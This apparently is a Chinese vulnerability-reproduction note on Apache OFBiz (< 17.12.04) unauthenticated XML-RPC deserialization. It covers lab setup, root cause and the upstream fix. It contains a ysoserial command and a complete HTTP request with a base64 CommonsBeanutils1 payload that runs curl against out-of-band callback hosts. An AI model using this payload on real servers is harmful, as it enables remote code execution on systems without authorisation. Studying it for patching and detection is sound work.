ofbiz官网:https://ofbiz.apache.org/
比较好的参考文章:
https://blog.csdn.net/weixin_45728976/article/details/108872281
影响版本
Apache Ofbiz:< 17.12.04
漏洞原理:
访问未授权的XML-RPC接口,构造XML-RPC协议请求格式,利用XML-RPC协议进行反序列化
XML-RPC介绍:
XML-RPC(XML Remote Procedure Call)是一种远程过程调用协议,它使用XML来编码和解码方法调用和响应。XML-RPC 允许在不同计算机之间通过HTTP协议或其他传输方式进行通信,从而实现远程方法调用。XML-RPC的目标是使不同编程语言和不同平台之间的通信变得简单和标准化。
XML-RPC 的基本原理包括以下几个方面:
方法调用:客户端通过构造一个XML-RPC请求,其中包括要调用的方法名称和方法参数,然后将请求发送给服务器。
XML编码:请求和响应数据被编码为XML格式,这使得数据可以在不同系统之间进行传输和解析。
方法执行:服务器接收到请求后,解析XML数据,执行相应的方法,并生成XML-RPC响应。
XML解码:响应数据被解码为XML格式,以便客户端可以提取所需的结果。
结果返回:服务器将XML-RPC响应发送回客户端,客户端解码响应并提取方法执行的结果。
漏洞搭建:
下载后idea导入,启动
docker环境:
docker pull andyjunghans/ofbiz
docker run -p 8080:8080 -p 8443:8443 andyjunghans/ofbiz
启动后,可以访问ofbiz主页:https://localhost:8443/myportal/control/main
漏洞利用:
漏洞url为:https://localhost:8443/webtools/control/xmlrpc
在 OfBiz 中存在 CommonsBeanutils1 利用链,然后生成反序列化数据并 base64 编码:
java -jar ysoserial-0.0.8-SNAPSHOT-all.jar CommonsBeanutils1 "curl http://RCE.bgkjco.dnslog.cn" | base64 | tr -d '\n'
以下是发送数据包,反序列化数据写在
POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Connection: close
Content-Type: application/xml
Content-Length: 4117
<?xml version="1.0"?>
<methodCall>
<methodName>22</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>22</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAAgzK/rq+AAAAMwAcAQAaeXNvc2VyaWFsL1B3bmVyMzA3MzUwNTAzMzIHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAFVB3bmVyMzA3MzUwNTAzMzIuamF2YQEACDxjbGluaXQ+AQADKClWAQAEQ29kZQEAEWphdmEvbGFuZy9SdW50aW1lBwAKAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADAANCgALAA4BADhjdXJsIGh0dHA6Ly85anRweHdrdWNpenRkem5pNzdrcnN4ZHF6aDU4dHlobi5vYXN0aWZ5LmNvbQgAEAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMABIAEwoACwAUAQANU3RhY2tNYXBUYWJsZQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHABcBAAY8aW5pdD4MABkACAoAGAAaACEAAgAYAAAAAAACAAgABwAIAAEACQAAACQAAwACAAAAD6cAAwFMuAAPEhG2ABVXsQAAAAEAFgAAAAMAAQMAAQAZAAgAAQAJAAAAEQABAAEAAAAFKrcAG7EAAAAAAAEABQAAAAIABnVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
漏洞产生:
定义xmlrpc的配置webapp/webtools/WEB-INF/controller.xml中,没有设置对应的auth选项,默认为false,导致不需要身份验证访问,这也是之后修复的一个点
<request-map uri="xmlrpc" track-serverhit="false" track-visit="false">
<security https="false"/>
<event type="xmlrpc"/>
<response name="error" type="none"/>
<response name="success" type="none"/>
</request-map>
版本修复
Fixed: Apache OFBiz unsafe deserialization of XMLRPC arguments
https://github.com/apache/ofbiz-framework/commit/4bdfb54ffb6e05215dd826ca2902c3e31420287a#diff-b31806fbf9690361ad449e8f263345d8
直接在controller.xml配置auth选项为true,此时xmlrpc则需要授权访问。